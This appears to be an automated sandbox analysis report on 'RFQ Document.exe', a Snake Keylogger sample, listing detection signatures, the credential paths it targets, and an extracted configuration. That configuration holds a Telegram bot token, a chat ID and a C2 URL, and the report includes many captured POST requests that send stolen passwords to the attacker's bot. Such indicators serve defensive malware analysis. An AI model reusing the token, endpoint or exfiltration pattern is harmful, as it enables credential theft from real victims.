Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ Document.exe

Overview

General Information

Sample Name:RFQ Document.exe
Analysis ID:491944
MD5:64468b2ab541687572ce6b435b41f2bd
SHA1:893ae234d351c762ab388a7337c625e4b213da6e
SHA256:d3ac98cf64ca2fca455b2e4f002c3381bcee699cf64bbfaa076222209f834b1a
Tags:exeSnakeKeylogger
Infos:

Most interesting Screenshot:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Snake Keylogger
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Telegram RAT
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Executable has a suspicious name (potential lure to open the executable)
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • RFQ Document.exe (PID: 2628 cmdline: 'C:\Users\user\Desktop\RFQ Document.exe' MD5: 64468B2AB541687572CE6B435B41F2BD)
    • RFQ Document.exe (PID: 6484 cmdline: 'C:\Users\user\Desktop\RFQ Document.exe' MD5: 64468B2AB541687572CE6B435B41F2BD)
  • cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram Token": "1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E", "Telegram ID": "1664748411"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendMessage"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 24 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.RFQ Document.exe.7b49c8.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x19480:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x18669:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x18ab0:$a4: \Orbitum\User Data\Default\Login Data
            • 0x19c31:$a5: \Kometa\User Data\Default\Login Data
            2.2.RFQ Document.exe.7b49c8.2.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              2.2.RFQ Document.exe.7b49c8.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                2.2.RFQ Document.exe.7b49c8.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  2.2.RFQ Document.exe.22f0000.3.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x1b280:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x1a469:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x1a8b0:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x1ba31:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 67 entries

                  Sigma Overview

                  No Sigma rule has matched

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 2.2.RFQ Document.exe.3465530.4.raw.unpackMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Token": "1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E", "Telegram ID": "1664748411"}
                  Source: RFQ Document.exe.6484.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendMessage"}
                  Machine Learning detection for sampleShow sources
                  Source: RFQ Document.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dllJoe Sandbox ML: detected
                  Source: 2.1.RFQ Document.exe.400000.0.unpackAvira: Label: TR/ATRAPS.Gen
                  Source: 2.2.RFQ Document.exe.400000.1.unpackAvira: Label: TR/ATRAPS.Gen

                  Compliance:

                  barindex
                  Detected unpacking (overwrites its own PE header)Show sources
                  Source: C:\Users\user\Desktop\RFQ Document.exeUnpacked PE file: 2.2.RFQ Document.exe.400000.1.unpack
                  Detected unpacking (creates a PE file in dynamic memory)Show sources
                  Source: C:\Users\user\Desktop\RFQ Document.exeUnpacked PE file: 2.2.RFQ Document.exe.4940000.5.unpack
                  Source: RFQ Document.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.4:49774 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: RFQ Document.exe, 00000001.00000003.668676239.000000000E820000.00000004.00000001.sdmp
                  Source: Binary string: wntdll.pdb source: RFQ Document.exe, 00000001.00000003.668676239.000000000E820000.00000004.00000001.sdmp
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_00405EC2 FindFirstFileA,FindClose,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_00402671 FindFirstFileA,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_00404A29 FindFirstFileExW,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0234E43Fh
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0234D5E8h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0234E89Fh
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0234ECFFh
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0234F15Fh
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0234DFDFh
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0234D021h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0234D5E8h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0234CBC0h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0234D5E8h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594AC41h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594E061h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594B099h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594D7B1h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594A7E9h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594DC09h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05949F39h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594D359h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594A391h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594CAA9h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05949AE1h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594CF01h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05949231h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594C651h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05949689h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05948DD9h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594C1F9h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594B949h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05948981h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594BDA1h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 0594B4F1h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05974832h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05973F59h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 059736A9h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05976241h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05973251h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05972979h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05975991h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 059750E1h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05974C89h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 059743B1h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05973B01h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05976699h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05972DF9h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05975DE9h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then jmp 05975539h
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]

                  Networking:

                  barindex
                  Uses the Telegram API (likely for C&C communication)Show sources
                  Source: unknownDNS query: name: api.telegram.org
                  May check the online IP address of the machineShow sources
                  Source: C:\Users\user\Desktop\RFQ Document.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\Desktop\RFQ Document.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\Desktop\RFQ Document.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\Desktop\RFQ Document.exeDNS query: name: checkip.dyndns.org
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /xml/84.17.52.39 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255b68d7103Host: api.telegram.orgContent-Length: 407Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c2167f0dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c23319c3Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c25218b6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c27117cdHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c288eef3Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c2af12f7Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c2ce142cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c2eaaeaaHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c309ad23Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c321840cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c33e2121Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c35d1eedHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c383480aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c3a2432dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c3ba1acdHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c3d6b706Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c3f5b542Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c414b3f2Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c433b23dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c452b1bfHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c46f4ccaHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c4957484Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c4bb9991Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c4e1c0b2Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c500bbdfHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c51fba70Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c53eb995Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c5542ea6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c57a55a2Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c5922b0dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c5b851c7Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c5d02817Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c5f64e24Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c61c73f5Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c6a4595fHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c6c35844Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c6e97fa6Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c71df22aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c73cf0fbHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255c75bef09Host: api.telegram.orgContent-Length: 407
